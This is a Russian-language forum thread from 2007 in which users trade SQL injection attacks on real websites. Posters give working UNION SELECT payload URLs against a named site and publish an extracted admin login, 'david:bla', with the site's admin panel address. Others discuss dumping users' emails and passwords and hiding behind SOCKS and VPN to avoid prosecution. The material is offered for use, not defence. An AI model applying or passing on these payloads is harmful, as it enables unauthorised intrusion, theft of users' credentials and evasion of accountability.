ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #391  
Старый 09.12.2007, 22:09
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

http://www.f1links.com/list.php?id=62'
раскрутите скулю плз. у меня не получилось(
 

  #392  
Старый 09.12.2007, 22:14
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Код:
http://www.f1links.com/list.php?id=62+UNION+SELECT+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),1),1)/*
 

  #393  
Старый 09.12.2007, 22:17
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Код:
http://www.f1links.com/list.php?id=-62+union+select+1,convert(count(*)+using+latin1)+from+users
4=\
Код:
http://www.f1links.com/list.php?id=-62+union+select+1,convert(concat(user,0x3a,pass)+using+latin1)+from+users+limit+0,1
david:bla
=
http://www.f1links.com/admin/

Have fun
__________________
..
 

  #394  
Старый 09.12.2007, 22:17
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.f1links.com/list.php?id=62+UNION+SELECT+1,aes_decrypt(aes_encr ypt(concat_ws(0x3a,user,pass),1),1)+from+users/*
qwerty

Слип цука =\
 

  #395  
Старый 10.12.2007, 03:41
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

Только что нашел sql инъекцию, через которую можно слить мыла и пароли юзеров сайта, это уголовно наказуемо?) И как от этого уберечься? Соксы и VPN ?
 

  #396  
Старый 10.12.2007, 03:45
LEE_ROY
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
Провел на форуме:
1917742

Репутация: 541


По умолчанию

тибя посодют, а ты неворуй!
Цитата:
это уголовно наказуемо?
да
Цитата:
Соксы и VPN ?
да
 

  #397  
Старый 10.12.2007, 03:49
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

А просто запостить в раздел инъекций можно?
P.S. может кому-нибудь понадобится.

Последний раз редактировалось Momiji; 10.12.2007 в 04:06..
 

  #398  
Старый 10.12.2007, 08:01
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Цитата:
Сообщение от Momiji  
А просто запостить в раздел инъекций можно?
P.S. может кому-нибудь понадобится.
Не можно, а нужно =)...
Если ваша уязвимость на сайте понравится участникам форума, то вам за это даже репутацию повысят...
 

  #399  
Старый 10.12.2007, 15:40
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

Есть сайт вида
Код:
http://www.site.ru/11/15/
При подстановке одинарной кавычки
Код:
http://www.site.ru/11/15'/
Плюет :
Код:
Ошибка
Внутренняя ошибка

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND `id` IN (SELECT `nid` FROM `node__access` WHERE `r` = 1 AND `uid` IN (408' at line 1
И отсюда у меня 2 вопроса:

это инъект ?
если да, то какого вида должен быть запрос?
 

  #400  
Старый 10.12.2007, 15:44
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

попробуй
http://www.site.ru/11/15+union+select+blablabla+from+hekbla--+/
__________________
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ